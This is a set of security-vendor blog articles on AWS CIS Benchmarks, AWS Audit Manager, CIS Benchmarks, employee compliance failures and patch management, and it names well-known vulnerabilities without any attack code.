Amazon Web Services (AWS) is the most widely used cloud platform. It offers hundreds of networking, storage, compute, and managed cloud services, each of which helps organizations to build robust and reliable IT infrastructure without the need to manage data centers and physical hardware. 

However, AWS’s richness and complexity can be challenging to configure and administer to maximize security, privacy, and compliance. This is a particular problem for organizations lacking cloud security expertise. They can deploy cloud infrastructure and services, but struggle to secure them. 

AWS CIS Benchmarks provide guidance and recommendations that help organizations to take a systematic, targeted, and effective approach to securing cloud infrastructure. Because CIS Benchmark recommendations map to information security and privacy regulations and standards, they also help organizations to achieve compliance. 

What are AWS CIS Benchmarks?

AWS CIS Benchmarks are platform-specific security recommendations published by the Center for Internet Security and developed by CIS members in a consensus-driven process. CIS membership comprises major cloud providers such as Amazon and Microsoft, as well as corporations, government agencies, and educational institutions. 

AWS CIS Benchmarks provide a secure configuration baseline agreed on by security experts from around the industry. AWS is complex and, as we’ve written before, most cloud security incidents and data leaks result from misconfiguration. As the cliché goes, cloud users don’t know what they don’t know—the AWS CIS Benchmarks provide the knowledge organizations need in a comprehensive and  actionable format.

The CIS publishes Benchmarks focused on many technologies and platforms, including cloud providers Microsoft Azure and Google Cloud Platform. This article focuses on Benchmarks targeting AWS and its services. We discussed CIS Benchmarks more generally in What Are CIS Benchmarks?

How Are AWS CIS Benchmarks Structured?

AWS Benchmark documents comprise a series of prescriptive configuration recommendations designed to optimize security and defend against common attacks. Each recommendation follows a format that includes:

  • A concise title.
  • An assessment status indicating whether the recommendation’s implementation can be automated.
  • A detailed description of the configuration setting and its recommended value.
  • A rationale explaining the reason for the recommendation and its importance.
  • An audit procedure detailing how to determine if a system complies with the recommendation.
  • A remediation procedure to bring the system into compliance.

CIS publishes several benchmarks relevant to AWS, but organizations typically start with CIS Amazon Web Services Foundations Benchmark. The AWS Foundations Benchmark is ideal for configuring an AWS environment with a strong security baseline. It provides recommendations for AWS services used by the majority of organizations, including:

  • AWS Identity and Access Management (IAM)
  • AWS Config
  • AWS CloudTrail
  • AWS Simple Notification Service (SNS)
  • AWS Simple Storage Service (S3)
  • Elastic Compute Cloud (EC2)
  • Relational Database Service (RDS)
  • AWS VPC

The Foundations Benchmark provides recommendations that fall into two profiles: Level 1 and Level 2. Level 1 details basic security recommendations that are straightforward to implement with limited impact on the service’s usefulness. Level 2 extends Level 1 with recommendations suited to environments with more stringent security requirements, such as those storing sensitive data. 

In addition to the Foundations Benchmark, CIS publishes Benchmarks that cover other AWS services and use scenarios. These include:

  • CIS AWS End User Compute Services Benchmark: Covers AWS services that include WorkSpaces, WorkDocs, and AppStream, among others.
  • CIS Amazon Web Services Three-tier Web Architecture Benchmark: Extends the Foundations Benchmark with recommendations for web architectures hosted on VPCs.
  • CIS Amazon Linux 2 Benchmark: Provides recommendations for securely configuring the Amazon Linux 2 distribution.
  • CIS Amazon Elastic Kubernetes Service (EKS) Benchmark: Provides recommendations for securing EKS.

8 AWS CIS Standards You Should Know

The CIS Amazon Web Services Foundations Benchmark is a substantial document with dozens of recommendations. To give you some idea of the type of recommendations, we’d like to highlight and briefly explain eight of the most important for organizations working to secure their AWS environment. 

1. Eliminate use of the ‘root’ user for administrative and daily tasks

The AWS root account has access to all AWS services. It can add and remove users, deploy any infrastructure, and view any data. The root account is useful when initially setting up an AWS account, but it poses a significant security risk and should not be used for day-to-day management. Avoid using the root account wherever possible, and do not share its credentials. 

2. Ensure multi-factor authentication (MFA) is enabled for all IAM users that have a console password

Enabling IAM multi-factor authentication prevents bad actors from authenticating if passwords are leaked or shared. AWS supports numerous multi-factor authentication methods, including smartphone apps and dedicated MFA devices. 

3. Ensure all S3 buckets employ encryption-at-rest

Data stored in Amazon S3 buckets should be encrypted to prevent unauthorized access to sensitive data. Encryption ensures that data will not be readable to an attacker, even if they manage to circumvent other security precautions. 

The CIS Amazon Web Services Foundations Benchmark also recommends enabling encryption for Elastic Block Storage (EBS), Relational Database Service (RDS), and Elastic File System (EFS). 

4. Ensure that S3 Buckets are configured with ‘Block public access’

S3 buckets can be configured to allow access to anyone without requiring authentication. Although this is occasionally useful when serving data to the public, accidentally or negligently configuring public availability is a major cause of data leaks. Ensure that all S3 buckets block public access unless you are confident public access is safe and necessary. 

5. Ensure CloudTrail is enabled in all regions

AWS CloudTrail is a logging service that records API calls and prepares logs. Administrators can use the logs to monitor AWS usage for unexpected patterns, identify possible attacks, and create an audit trail for compliance auditing. Enabling CloudTrail is essential to gaining transparency into how your AWS environment is used and by whom. 

6. Ensure CloudTrail trails are integrated with CloudWatch Logs

CloudWatch is a monitoring service that uses data, including CloudTrail logs, to provide analysis and actionable insights into your AWS infrastructure. Integrating CloudTrail logs with CloudWatch allows users to detect unusual behavior, analyze and visualize data, and create alarms and alerts for anomalous events. 

7. Ensure no Network ACLs allow ingress from 0.0.0.0/0 to remote server administration ports

Network Access Control Lists provide a stateless firewall that allows AWS users to filter traffic coming into and out of their cloud environment. Blocking unrestricted access to server administration ports such as SSH’s port 22 prevents bad actors from attempting to interact with those services and circumvent their security. 

The AWS Benchmarks include a similar recommendation for Security Groups, another of AWS’s firewall services: “Ensure no security groups allow ingress from 0.0.0.0/0 to remote server administration ports.”

8. Ensure the default security group of every VPC restricts all traffic

When AWS users launch an EC2 instance within a Virtual Private Cloud without specifying a security group, it will be associated with the default security group. The default security group’s initial configuration denies inbound traffic but allows all outbound traffic and all traffic between instances. This is not the optimal security configuration, and the Benchmarks recommend implementing a new default security group configuration that denies all ingress and egress connections. 

Verify Your AWS Environment Conforms To CIS AWS Benchmarks

KirkpatrickPrice’s cloud security audits will help your organization to understand the security and compliance status of its AWS environment. Our cloud audit framework is based on the CIS Benchmarks, and experienced AWS Certified Cloud Practitioners carry out all audits. Contact a cloud security specialist to learn more.

Audits are essential for businesses that need to demonstrate compliance with regulatory frameworks and standards, but they are often time-consuming and disruptive. Businesses must ensure relevant controls are implemented and gather evidence to demonstrate implementation to auditors. Evidence gathering is among the most time-consuming and error-prone aspects of auditing, but it is, fortunately, an aspect that can be automated to some degree. 

AWS Audit Manager is an evidence collection automation tool for the Amazon Web Services cloud platform. In this article, we’ll explore how AWS Audit Manager can streamline your audit process. We’ll also consider what it can’t do and why you should consider using a CPA-backed audit management solution like the KirkpatrickPrice Online Audit Manager

What is an Audit Manager?

Audit management aims to organize, simplify,  and streamline the auditing process. Traditionally, an audit manager was a professional who facilitated audits within a company. Today, the term is increasingly used for software services that perform some of the same roles. 

Audit manager software helps businesses to gather and organize audit evidence. It also tracks the evidence-gathering process so stakeholders can monitor progress and prioritize audit-related work. The software is typically aware of the processes and procedures a business must implement to comply with various regulatory requirements and therefore provides a framework that guides evidence gathering. 

Once the evidence has been gathered, it can then be supplied to the CPA firm carrying out the audit. It is worth noting that CPA-operated audit managers like the KirkpatrickPrice Online Audit Manager allow auditees to communicate directly with their auditor. They can ask the auditor questions and receive advice and guidance. The auditor can review materials as they are gathered. A platform-specific audit management tool like Amazon Audit Manager lacks this facility. However, it can be useful as one platform-specific stage of an end-to-end evidence-gathering process. 

How Does AWS Audit Manager Streamline Compliance Audits?

Amazon Audit Manager is a cloud service that automates the collection of compliance evidence. The business informs the Audit Manager of the relevant controls, where a control is a “rule” from a regulatory framework or standard. Audit Manager pulls relevant data from other AWS services, including AWS Security Hub, AWS Config, and AWS CloudTrail. That data is used as evidence of the control’s implementation and is converted to an auditor-friendly format.  

Continuous Compliance

Continuous compliance is one of the most significant advantages of automated evidence gathering. When evidence gathering is manual, it tends to be carried out periodically. Evidence is gathered for “the big audit,” and because that’s an expensive process, it isn’t repeated until the next audit period rolls around. 

Automated evidence gathering helps businesses to maintain continuous compliance. Evidence gathering becomes a much lower effort, so keeping audit evidence up-to-date makes sense. Because the evidence is always fresh, it’s possible to maintain continuous compliance, and there’s much less evidence gathering overhead when a new audit is required. 

Automatic Evidence Collection

After initial configuration, which we’ll discuss in the next section, Amazon Audit Manager is almost entirely automated. It supports several automated data sources with varying data collection frequencies:

  • Amazon CloudTrail is used to track user activity. Data is collected continuously. 
  • AWS Config provides snapshots of resource security. Data is collected when triggered by an AWS Config rule.
  • AWS Security Hub provides snapshots from security checks. Data is collected per Security Hub check schedules. 
  • AWS API calls collect resource configuration data snapshots from AWS resources daily, weekly, or monthly.
Simplified Audit Workflows

Evidence gathering can be complex and challenging to manage. It’s easy to make mistakes that extend the length and increase the cost of audits. Automatic data collection lifts a significant burden from auditees. The software completes most of the evidence gathering without human intervention, which is possible because AWS Audit Manager is deeply integrated into the AWS platform. 

The tradeoff is that it can only gather evidence from AWS, and you must find another solution for on-premise infrastructure or resources hosted on other cloud platforms. That’s where a platform agnostic audit management solution like the KirkpatrickPrice Online Audit Manager shines: it can be used to gather and manage evidence from all of your business’s infrastructure, including the evidence generated by AWS Audit Manager. 

Audit Evidence Access Controls

Audit evidence is confidential, and access must be controlled and managed. As you might expect, AWS Audit Manager works with AWS Identity and Access Management (IAM), a solution businesses with AWS-based infrastructure use already. Audit Manager can segregate individual assessments to ensure they are accessed only by authorized individuals and groups. 

AWS Audit Manager Frameworks Explained

Thus far, we’ve said little about how users select which evidence is to be gathered. That’s the role of Audit Manager frameworks. Frameworks structure and automate assessments, the Audit Manager function that gathers evidence relevant to an audit. 

Each framework provides groups of audit controls and mappings to AWS resources and data. These mappings are particularly useful: without them, it requires considerable expertise to link the controls in regulatory standards to resources and configurations on real-world infrastructure platforms.

AWS provides pre-built frameworks for a range of compliance standards, including:

  • ISO/IEC 27001:2013 Annex A
  • PCI DSS V3.2.1
  • SOC 2
  • CIS Benchmark for CIS Amazon Web Services Foundations Benchmark
  • General Data Protection Regulation (GDPR)
  • FedRAMP Moderate Baseline
  • Health Insurance Portability and Accountability Act (HIPAA)

In addition to pre-built frameworks, users can build custom frameworks. These allow businesses to deploy AWS Audit Manager assessments for which no pre-built option exists. They can also create assessments and gather evidence to meet other business needs, including internal audits. 

The Limitations of Audit Managers and Audit Automation

AWS Audit Manager is a valuable tool for businesses with AWS-hosted infrastructure and services. It performs well within the limited scope of its capabilities. But it is not a complete audit automation solution. Most importantly, no audit automation tool can complete an audit, assess compliance, and deliver a reputable audit report. For many regulatory standards, only a licensed CPA firm with information security expertise can do so. Amazon’s documentation makes this clear: 

“AWS Audit Manager assists in collecting evidence that’s relevant for verifying compliance with specific compliance standards and regulations. However, it doesn’t assess your compliance itself. “

Other limitations include:

  • Evidence-gathering is limited to AWS and the data sources the platform supports.
  • A lack of direct contact with auditors.
  • Limited project management capabilities.

AWS Audit Manager can be used in conjunction with a CPA-supported audit management tool that helps users to overcome these limitations. KirkpatrickPrice’s Online Audit Manager is used to gather evidence and streamline audits for many infrastructure platforms.  In addition to being an evidence-gathering tool, it is also a powerful communication, accountability, and project management platform that provides direct access to your auditor. Contact a senior audit specialist to learn more. 

CIS Benchmarks are collections of recommendations and best practices for securely configuring servers, networks, software, and other IT systems. Developed by the Center for Internet Security, the benchmarks provide guidance businesses can use to implement secure systems, assess their current level of security, and achieve regulatory compliance. 

Given the number and complexity of IT services and systems, it is challenging for businesses to develop policies and implement procedures that maintain adequate security. CIS Benchmarks provide comprehensive best practices for various platforms and technologies, including cloud platforms like AWS and Microsoft Azure.

In this article, we take a closer look at CIS Benchmarks and how businesses can use them to improve cybersecurity and compliance with information security regulations and standards. 

What is the Center for Information Security?

The Center for Internet Security (CIS) is a non-profit organization that aims to make the internet safe by devising and promoting security best practices. It publishes the CIS Controls and CIS Benchmarks, which are developed in a crowd-sourced consensus-driven process by a membership that includes corporations, government agencies, and other institutions.

What Are CIS Benchmarks?

The CIS Benchmarks are recommendations for securing IT systems. They provide the information businesses need to verify they are following best practices and instructions for best practice implementation.

To look more closely at one of the dozens of CIS Benchmarks, the CIS Amazon Web Services Foundations Benchmark is a 250-page document covering security benchmarks for a wide range of AWS services, including identity and access management, storage, logging, monitoring, and networking. 

Each section provides best practices for commonly used services. For example, the storage section provides guidance for S3, EC2, RDS, and EFS. Each best practice includes a rationale, instructions for verifying the best practice is implemented, and remediation instructions explaining how to secure the service.

The benchmarks are a valuable resource for businesses that need to assess and improve their security posture. That’s why we use the CIS Benchmarks for cloud services—including AWS, Azure, and GCP—as the foundation of our cloud security audits.

CIS Controls vs. CIS Benchmarks

As part of its mission to promote internet security, the CIS publishes the CIS Controls, a compendium of 18 critical security best practices that businesses should follow to defend against known cyberattacks. The controls address many best practices, including for inventory control, data protection, access management, malware, network monitoring, penetration testing, and more. Like the CIS Benchmarks, the CIS Controls are free, and they can be downloaded by any business looking to implement secure systems. 

CIS Controls and CIS Benchmarks differ in specificity. Whereas the CIS Controls offer broad, high-level best practices for a wide range of systems, the CIS Benchmarks offer actionable best practices for specific platforms and technologies, including cloud platforms, operating systems, network-connected devices, and applications. Many CIS Benchmarks refer to the relevant CIS Controls so users can track their progress towards compliance. 

Which Information Security Areas Are Covered By CIS Standards?

CIS Benchmarks cover a wide array of services, platforms, and software, including, among others:

  • Desktop operating systems: Microsoft Windows and macOS.
  • Server operating systems: Debian, Ubuntu, CentOS, RHEL.
  • Server software: Microsoft IIS, Microsoft Windows Server, Nginx, Apache.
  • Virtualization and Cloud Software: VMware, Kubernetes, Docker.
  • Cloud platforms: AWS, Microsoft Azure, Google Cloud Computing Platform, Alibaba Cloud.
  • Desktop software: Microsoft Office, Google Chrome, Safari, Zoom.

What Are CIS Benchmark Levels?

CIS associates each benchmark recommendation with a profile level: Level 1, Level 2, or STIG. The profiles indicate the security level achieved by implementing a recommendation. 

Level 1 recommendations are basic security practices essential to creating a secure IT environment. Level 2 recommendations are high-security recommendations for systems hosting sensitive data or other high-security scenarios. Level 2 recommendations may be more difficult to implement, and they may disrupt a business’s operations. 

For example, the CIS Amazon Web Services Foundations Benchmark contains the following two recommendations, applicable to Level 1 and Level 2, respectively. 

  • Level 1: Ensure CloudTrail is enabled in all regions
  • Level 2: Ensure CloudTrail log file validation is enabled

The STIG profile is intended to help businesses to comply with the Security Technical Implementation Guide, a baseline security standard created by the Defense Information Systems Agency (DISA). The STIG profile includes CIS Level 1 and Level 2 recommendations, as well as additional recommendations required for STIG compliance. 

What are CIS Hardened Images?

CIS Hardened Images are virtual machine (VM) images with configurations that conform to the CIS Benchmarks. A VM image is a snapshot of a computer storage device containing the operating system and key library and utility software. They can be run directly by virtualization software and cloud platforms or copied to a physical server. 

CIS Hardened Images enable businesses to deploy servers and other devices with secure configurations out-of-the-box. Installing a secure VM image is a faster and more reliable way to achieve benchmark compliance than installing an operating system and software and then manually configuring it.

CIS publishes hardened images for most major server operating systems, including Microsoft Windows Server, Amazon Linux, Debian, Ubuntu, CentOS, Oracle Linux, and Red Hat Enterprise Linux. It also publishes images for applications such as Nginx and PostgreSQL. 

Major cloud platforms, including AWS, Microsoft Azure, Google Cloud Platform, and Oracle Cloud, offer CIS Hardened Images in their marketplaces, allowing users to deploy the images directly to virtual servers running on the platform. 

CIS Benchmarks and Regulatory Compliance

Regulatory frameworks and standards impose security and privacy obligations on businesses, but they do not provide concrete guidance for achieving compliance. It’s challenging for businesses to bridge the gap between regulations and real-world implementations on particular platforms. 

CIS Benchmarks are designed to align with major information security regulatory frameworks and standards. In CIS’s language, the recommendations “map” to regulations and standards. Implementing CIS benchmark recommendations can therefore help businesses to comply with aspects of standards and frameworks that include:

  • PCI DSS
  • HIPAA
  • NIST
  • FISMA
  • GDPR
  • ISO 27001

One example of how this works is PCI DSS Requirement 2.2, which requires organizations that process credit card data to “develop configuration standards for all system components…consistent with industry-accepted hardening standards.” CIS Benchmarks qualify as an industry-accepted standard. In fact, they are mentioned in the Requirement as an accepted standard alongside hardening standards from the SANS Institute and the National Institute of Standards Technology (NIST).

Verify Your IT Environment Is Secure and Compliant

CIS Benchmarks make it easier for businesses to secure IT systems and comply with information security standards and regulations. However, compliance should be verified by an independent third party. 

KirkpatrickPrice helps organizations assess, verify, enhance, and demonstrate their security with compliance audits, pen testing, security awareness training, and more. Our comprehensive audit capabilities include:

To learn more, contact a KirkpatrickPrice information security specialist today.

Business managers and IT professionals are inclined to attribute employee-caused security failures to malice, ignorance, or laziness. After all, the business has security policies and procedures. Employees know about them or, at the very least, have signed a declaration affirming they know about them. The IT team has implemented secure systems. 

And yet, employees often circumvent these systems and ignore information security policies, exposing the business to cybersecurity attacks and regulatory risk. Malice and incompetence seem the parsimonious explanation. But the real reasons are more complex.

Why Do Employees Fail to Comply with Security Policies?

A recent study from the Harvard Business Review revealed that few security policy breaches resulted from conscious malice, including incidents where breaches were deliberate. Why Employees Violate Cybersecurity Policies attributes the majority of employee security protocol breaches to four causes:

  • To better accomplish tasks for their job.
  • To access information or functionality they need to do their job.
  • To help other employees to do their work.
  • Because stress drives them to increase productivity at the expense of security.

In short, employees typically fail to comply with security policies for productivity and altruism, not malice or ignorance. That doesn’t make failure to comply any more acceptable or mitigate the regulatory risk, but it may help businesses to build secure and efficient processes. 

The 6 Common Employee Security and Compliance Failures

Understanding why employees fail to comply is helpful, but businesses also need to know how employees typically breach security policies. Let’s explore six of the most common ways employees fail to follow security best practices. 

1. Configuration Errors

Configuration errors expose software and services to increased security risk. For example, it is a configuration error to grant public access to an AWS S3 bucket that stores sensitive information.

The OWASP Top Ten lists misconfiguration as one of the most prevalent web application security vulnerabilities, with almost 90% of web apps exhibiting configuration errors. Misconfiguration is also a significant source of cloud security breaches. The National Security Agency (NSA) says misconfiguration is the most common cloud security vulnerability.

Other common examples of misconfiguration include:

  • Deploying publicly accessible databases with inadequate authentication
  • Using default usernames and passwords
  • Configuring firewalls with overly permissive rules
  • Failing to limit access to sensitive data and resources

2. Falling for Social Engineering Attacks

Social engineering attacks manipulate employees into acting in ways that are contrary to security policies. Phishing attacks are the most common type. In a phishing attack, the attacker sends an email or instant message containing a malicious link to many different employees. The link might lead to a fake login form or a malware-infected site. 

The attacker wants to harvest login credentials or infect a trusted device. Once they can access one device, they can use it to island hop to others, circumvent security controls, and gather sensitive information.

Every organization is at risk of phishing, but it’s far from the only social engineering attack. Others include:

  • Spear phishing: a refined phishing variant that focuses on specific employees within an organization, using knowledge of the individual to craft a convincing deception. High-level executives and technical employees with wide-ranging access to IT systems are frequent spear phishing targets.
  • Smishing: attacks that use SMS to manipulate employees via spoofed phone numbers
  • Executive impersonation attacks: the attacker contacts an employee while pretending to be a high-level executive, often to ask the employee to send money to an account under the attacker’s control. Employees rarely have the confidence to challenge executive requests.

3. Exposing Log-In Credentials

The simplest way to compromise business IT systems is with stolen login credentials and API keys. If an attacker can authenticate, they can bypass security controls and take advantage of the employee’s trusted status. The paradigmatic log-in exposure is a username and password stuck to an employee’s monitor, but that’s not the only way attackers obtain credentials. 

  • Sharing credentials: Employees often share authentication credentials with other employees, including those who may not have the same authorization level.
  • Re-using credentials: Using the same usernames and passwords on business systems and other online services increases the risk that they will be exposed.
  • Uploading credentials to version control systems: Employees may choose to upload credentials and keys to version control instead of using secure secret management services.
  • Phishing attacks: As mentioned above, attackers use phishing attacks to harvest authentication credentials.

4. Circumventing Secure Systems

Security and IT professionals implement and monitor secure systems they expect employees to use. But there is often a trade-off between security and productivity, and employees may seek a more convenient option if it allows them to work more efficiently. 

This phenomenon is one of the key drivers of shadow IT, in which employees, teams, and even whole business units use non-approved devices, software, and IT and cloud services because they are “better” than the services officially approved by the company. Of course, employees and security professionals often define “better” very differently, especially when sensitive data is stored and processed on unvetted third-party services. 

5. Poor Data Storage and Transport Practices

A nightmare scenario for IT security professionals: an employee accesses sensitive data and transfers it unencrypted to a portable drive. They want to work on the data at home but lose the bag containing the drive on their commute. Without training, employees are unlikely to understand the need for encryption and the consequences of removing data from secure storage. 

Alternative risk scenarios include employees who:

  • Email sensitive data to third parties or themselves
  • Share authentication credentials with unauthorized third parties
  • Upload data to insecure cloud services for easier access

In our examples, the employee may be acting from positive motives. But deliberate data theft by departing employees is also a huge issue—one reason removing access from employees who quit or are let go is so important. 

6. Failure to Secure Remote Working Environments

Employees who work remotely present risks that don’t arise when the business controls the working environment. These risks are exacerbated when employees use their personal devices and preferred software to complete tasks. 

Risks include:

  • Unsecured WiFi networks and routers
  • Use of devices that may have been compromised
  • Reduced security awareness and diligence
  • Reduced monitoring and oversight

To learn more about how businesses can reduce remote work risks, visit KirkpatrickPrice’s Remote Access Security Testing resources. 

Risk Management: Reducing Employee Compliance Failures

We’ve seen why employees ignore security policies and how that can increase risk. But what can businesses do to manage that risk? Combatting this type of insider threat may be challenging, but we have identified several approaches that help employees act securely and responsibly.

  • Promote a positive security culture. Ensure security policies are transparent and easy to understand. Encourage employees to report potential security issues and incentivize them to conform to policies.
  • Penetration testing. Pen testing can help to identify potential weaknesses, including those caused by employees.
  • Security awareness training. Ensure all employees understand essential security policies and why the company expects them to be followed.
  • Information security audits. Regular audits help businesses to identify and mitigate inadequate policies, processes, and behaviors.

Connect with an Expert

If you want to talk to an information security and compliance expert about reducing employee risk and combating insider threats, contact KirkpatrickPrice today.

Regular software updates and rigorous patch management processes are essential to maintaining security and compliance. Even the most careful proprietary and open source software development introduces bugs. Some of those bugs create security vulnerabilities, and cybercriminals are always looking for opportunities to infiltrate business IT resources and steal sensitive data. 

A report from Arctic Wolf, a security operations vendor, shows the scale of the problem. Exposure of a known vulnerability to external networks caused 82% of the security incidents the company handled in the first quarter of 2022. Of those incidents, 57% could have been avoided by software patching. The remainder were caused by exposing vulnerable services to the public internet. 

A systematic, scheduled, and comprehensive patch management policy is the only way businesses can hope to manage the risk at scale. 

What is Patch Management?

Patch management encompasses a range of processes that ensure potentially vulnerable software is updated as soon as a fix is available. The term “patch” comes from the development world, where a patch is a file containing a set of changes to a piece of software. Patches add and remove features and refactor code. But, most importantly, they fix known vulnerabilities.

We all regularly patch (update) software on our devices with the click of a button. However, patching is much more challenging for complex business IT systems. Most of us don’t mind rebooting our smartphone when it updates, but a business can’t simply shut down its network. It can’t apply patches that haven’t been tested in case they break essential services. And, quite often, it doesn’t know which software needs patching in the first place. 

Software patch management is intended to overcome these problems. It typically involves a number of processes, including:

  • Software discovery: Businesses should develop an inventory of all operating systems and software on their network. They can’t update software if they don’t know about it.
  • Standardization: Patch management is less challenging if businesses standardize on particular operating systems and software products.
  • Vulnerability monitoring: IT and security professionals should track vulnerability reports for software the business uses.
  • Development tracking: They should also keep abreast of patch releases so they can quickly apply patches.
  • Risk assessment: Assessing vulnerability risk helps businesses to prioritize critical vulnerabilities and patches for core systems.
  • Testing: Modifying software has the potential to change its functionality and cause performance regressions. Testing allows businesses to identify issues before they impact production systems.
  • Patching: The patches are applied to production systems, often beginning with a subset to verify there are no unexpected results.
  • Monitoring: Ensure that all IT resources perform as expected after the update.

As you can see, patch management is not straightforward. However, many aspects can be automated by patch management software, as we’ll see later in this article.

Patch Management and Compliance

Compliance and audit failures may occur when businesses:

  1. Fail to patch vulnerabilities promptly.
  2. Implement inadequate patch management processes.

As we’ve seen, exposing software with known vulnerabilities to the public internet is a common cause of network infiltration and data theft. That reality is reflected in information security and privacy regulations and standards. 

  • PCI DSS: PCI Requirement 6.1 states that businesses should establish a process to identify security vulnerabilities. PCI Requirement 6.2 states that businesses should ensure all systems and software are protected from known vulnerabilities.
  • HIPAA: 45 CFR § 164.308(1)(i) states that businesses should implement policies and procedures to prevent, detect, contain, and correct security violations.
  • ISO 27001: Control A.12.6.1 focuses on technical vulnerability management and states that vulnerabilities should be quickly identified, subject to a risk assessment, and remediated through proper measures, which include asset patching.

Other information security frameworks and standards include similar requirements which assert or imply the necessity of a robust and effective patch management process. 

How to Monitor Critical Security Vulnerabilities

Businesses must be aware of software vulnerabilities before they can fix them. To do so, it is necessary to:

  1. Understand which software your business operates.
  2. Monitor sources of vulnerability information for relevant announcements.
  3. Assess the level of risk a vulnerability poses.

There is no canonical source for vulnerability data, and it is often best to monitor vulnerability and update information published by software vendors and open source projects. You should also monitor public vulnerability databases, which include:

These databases allow users to search for vulnerabilities in specific software and software created by specific vendors. 

Patch Management Software

Patch management software automates some of the processes outlined above, allowing businesses to reduce the cost and complexity of keeping their software safe and up-to-date. There are many competing patch management software solutions with varying features. Businesses should take the time to investigate the capabilities of each to find the best solution for their unique circumstances, but we’d like to highlight three prominent solutions. 

AWS Systems Patch Manager

AWS Systems Patch Manager is a capability of AWS Systems Manager, which integrates many system automation tools. It can automate patching on managed AWS nodes, including operating system and application patching. Usefully, Patch Manager integrates with System Manager’s maintenance window functionality, so patching can be scheduled to run at convenient times. 

Azure Automation Update Management

Azure Automation offers a range of automation tools for Microsoft’s Azure cloud platform. The Update Management tool can automatically perform updates for Windows and Linux operating systems on Azure or on-premises. 

Red Hat Satellite

Red Hat Satellite is a comprehensive infrastructure management tool with automatic patch management functionality. Satellite can report which servers need to be updated and automatically apply updates as required. 

Other patch management tools include Solarwinds Patch Manager, LANDesk Patch Manager, ManageEngine Patch Manager Plus, and Ivanti Patch Manager.

3 Critical Vulnerabilities You Should Patch Immediately

Failure to patch is the root cause of many of the most serious security incidents. A vulnerability in widely used software can have a catastrophic impact on thousands of businesses. To conclude this article, we will look at three critical and widespread vulnerabilities, all of which continue to be exploited by cybercriminals, despite the availability of patches that would protect businesses and their customers.

Log4J

Log4J is a logging library for the Java ecosystem. It is integrated into hundreds of thousands of servers and applications and is particularly popular in the enterprise space. In 2021, a critical remote code execution vulnerability was discovered. Log4Shell allows malicious third parties to execute arbitrary code and has been described as “the biggest, most critical vulnerability of the last decade.”

A patch was released to fix the vulnerability immediately after it was discovered, yet many servers and applications remain vulnerable. 

ProxyShell

ProxyShell is an attack that relies on a series of vulnerabilities affecting Microsoft Exchange. An attacker can string the vulnerabilities together to achieve remote code execution via a PowerShell instance available from the web. ProxyShell is relatively straightforward to exploit, requiring only a specially crafted email containing code that the attacker can trick the server into executing. 

Microsoft released patches that mitigate the risk in May and July 2021.

SpringShell

Spring is an enormously popular web framework for Java. Earlier this year, a remote code execution vulnerability was discovered. Although not considered as severe as the Log4J vulnerability because it is more challenging to implement, cybercriminals quickly began to exploit SpringShell to gain access to servers running the Spring framework. 

A patch to mitigate the vulnerability was released immediately, and businesses using the Spring Framework should update to a recent version as soon as possible.

Enterprise Security and Compliance with KirkpatrickPrice

KirkpatrickPrice provides services to help businesses secure their infrastructure and comply with regulatory frameworks and standards, including compliance audits, penetration testing, and remote access security testing.